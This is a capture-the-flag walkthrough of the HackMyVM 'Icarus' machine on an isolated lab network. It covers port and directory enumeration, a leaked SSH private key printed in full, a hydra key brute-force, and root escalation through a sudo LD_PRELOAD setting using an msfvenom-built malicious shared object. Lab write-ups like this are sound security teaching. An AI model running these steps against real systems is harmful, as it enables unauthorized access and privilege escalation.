ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN --
10.9.9.0/24 -- that has no internet accessNmap Results
# Nmap 7.95 scan initiated Thu Nov 20 17:32:45 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.15
Nmap scan report for 10.9.9.15
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b6:65:56:40:8d:a8:57:b9:15:1e:0e:1f:a5:d0:52:3a (RSA)
| 256 79:65:cb:2a:06:82:13:d3:76:6b:1c:55:cd:8f:07:b7 (ECDSA)
|_ 256 b1:34:e5:21:a0:28:30:c0:6c:01:0e:b0:7b:8f:b8:c6 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: LOGIN
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 20 17:32:57 2025 -- 1 IP address (1 host up) scanned in 12.66 secondsℹ️
For convenience, I'm going to add an entry to my
/etc/hosts file so I don't have to repeatedly type the IP address.echo -e '10.9.9.15\t\ticarus.hmv' | sudo tee -a /etc/hostsService Enumeration
TCP/80
Penetration Testing
ℹ️
Normally, I'd do a walk of the application before doing the penetration test, but since this app is pretty simple and only presents a login screen, we'll get right into it.
/check.phpDirectory and File Enumeration
gobuster dir -u http://icarus.hmv -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php -t 100 -o dir.txt
a file is pretty interesting at 9641 bytescurl -s http://icarus.hmv/a
gobuster output. I suspect these may be URLs.curl -s http://icarus.hmv/a | xargs -I {} curl 'http://icarus.hmv/{}'Iterate over each URL and see what we get...
cat << EOF > id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA5xagxLiN5ObhPjNcs2I2ckcYrErKaunOwm40kTBnJ6vrbdRYHteS
afNWC6xFFzwO77+Kze229eK4ddZcwmU0IdN02Y8nYrxhl8lOc+e5T0Ajz+tRmLGoxJVPsS
TzKBERlWpKuJoGO/CEFLOv6PP6s79YYzZFpdUjaczY96jgICftzNZS+VkBXuLjKr79h4Tw
z7BK4V6FEQY0hwT8NFfNrF3x3VPe0UstdiUJFl4QV/qAPlHVhPd0YUEPr/95mryjuGi1xw
P7xVFrYyjLfPepqYHiS5LZxFewLWhhSjBOI0dzf/TwiNRnVGTZhB3GemgEIQRAam26jkZZ
3BxkrUVckQAAA8jfk7Jp35OyaQAAAAdzc2gtcnNhAAABAQDnFqDEuI3k5uE+M1yzYjZyRx
isSspq6c7CbjSRMGcnq+tt1Fge15Jp81YLrEUXPA7vv4rN7bb14rh11lzCZTQh03TZjydi
vGGXyU5z57lPQCPP61GYsajElU+xJPMoERGVakq4mgY78IQUs6/o8/qzv1hjNkWl1SNpzN
j3qOAgJ+3M1lL5WQFe4uMqvv2HhPDPsErhXoURBjSHBPw0V82sXfHdU97RSy12JQkWXhBX
+oA+UdWE93RhQQ+v/3mavKO4aLXHA/vFUWtjKMt896mpgeJLktnEV7AtaGFKME4jR3N/9P
CI1GdUZNmEHcZ6aAQhBEBqbbqORlncHGStRVyRAAAAAwEAAQAAAQEAvdjwMU1xfTlUmPY3
VUP9ePsBwSIck6ML8t35H8KFLKln3C4USxpNNe/so+BeTo1PtBVHYpDFu9IMOvrl7+qW3q
dLGyUpdUtQXhPK+RvJONt30GwB+BEUlpQYCW9SuHr1WCwfwPMA5iNdT2ijvx0ZvKwZYECJ
DYlB87yQDz7VCnRTiQGP2Mqiiwb7vPd/t386Y+cAz1cVl7BnHzWWJTUTkKCwijnvjYrD0o
tTQX4sGd6CrI44g+L8hnYuCZz+a0j6IyUfXJqj6l+/Z2Af7pJjbJD3P28xX7eY0h1Cec2l
/sb7qg2wy0qJNywJ35l8bZzZKjkXztPLOqMFQ6Fh0BqSdQAAAIEAlaH0ZEzJsZoR3QqcKl
xRKjVcuQCwcrKlNbJu2qRuUG812CLb9jJxJxacJPBV0NS832c+hZ3BiLtA5FwCiGlGq5m5
HS3odf3lLXDfIK+pur4OWKBNLDxKbqi4s4M05vR4gHkmotiH9eWlCNuqL46Ip5H1vFXeJM
pLRLN0gqOGuQQAAACBAPfffuhidAgUZH/yTvATKC5lcGrE7bkpOq+6XMMgxEQl0Hzry76i
rGXkhTY4QUtthYo4+g7jiDzKlbeaS7aN8RYq38GzQnZZQcSdvL1yB/N554gQvzJLvmKQbm
gLhMRcdDmifUelJYXib2Mjg/BLaRXaEzOomUKR2nyJH7VgU+xzAAAAgQDuqkBp44indqhx
wrzbfeLnzQqpZ/rMZXGcvJUttECRbLRfohUftFE5J0PKuT8w0dpacNCVgkT9A0Tc3xRfky
ECBQjeKLvdhcufJhQl0pdXDt1cpebE50LE4yHc8vR6FEjhR4P2AbGICJyRS7AX7UnrOWdU
IE3FeNP0r5UiSDq16wAAAA1pY2FydXNAaWNhcnVzAQIDBA==
-----END OPENSSH PRIVATE KEY-----
EOFSave the SSH key to a file for later
Username Enumeration
We have a SSH key for some user, but who? We have a few options here:
- Take some lucky guesses
- See if the web app reveals known usernames
- Use
hydraand thesshkeymodule to brute force a potential login
💡
The box is called
icarus so makes sense to try that first...hydra -I -f -V -l icarus -p id_rsa sshkey://icarus.hmv
Exploit
ssh -i id_rsa icarus@icarus.hmv
Post-Exploit Enumeration
Operating Environment
OS & Kernel
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
Linux icarus 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux
Current User
uid=1000(icarus) gid=1000(icarus) groups=1000(icarus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Matching Defaults entries for icarus on icarus:
env_reset, mail_badpass, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User icarus may run the following commands on icarus:
(ALL : ALL) NOPASSWD: /usr/bin/id
Network Configurations
Network Interfaces
ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether bc:24:11:af:16:08 brd ff:ff:ff:ff:ff:ff
inet 10.9.9.15/24 brd 10.9.9.255 scope global dynamic ens18
valid_lft 4979sec preferred_lft 4979sec
inet6 fe80::be24:11ff:feaf:1608/64 scope link
valid_lft forever preferred_lft forever
Privilege Escalation
Becoming Root
Sudo Environment Variable
Running sudo -l upon SSH'ing into the target, the exploit immediately sticks out...
This user is allowed to pass the LD_PRELOAD environment variable when running sudo /usr/bin/id. This means that we can craft a malicious shared object — .so file, similar to a .dll on Windows — and execute in the root user's context.
💡
A
.so file is similar in design to a .dll file on Windows, in that it allows a developer, engineer, etc, to write a set of reusable code once and ship it hosts to allow other programs to call this reusable code. Except in our case, the reusable code will contain a malicious set of instructions.msfvenom -p linux/x64/exec CMD="/bin/bash -ip" -f elf-so -o root.soGenerate a .so to spawn a bash shell
scp -i id_rsa root.so icarus@icarus.hmv:/tmpCopy the .so to the
Flags
User
Dontgotothesun
Root
RIPicarus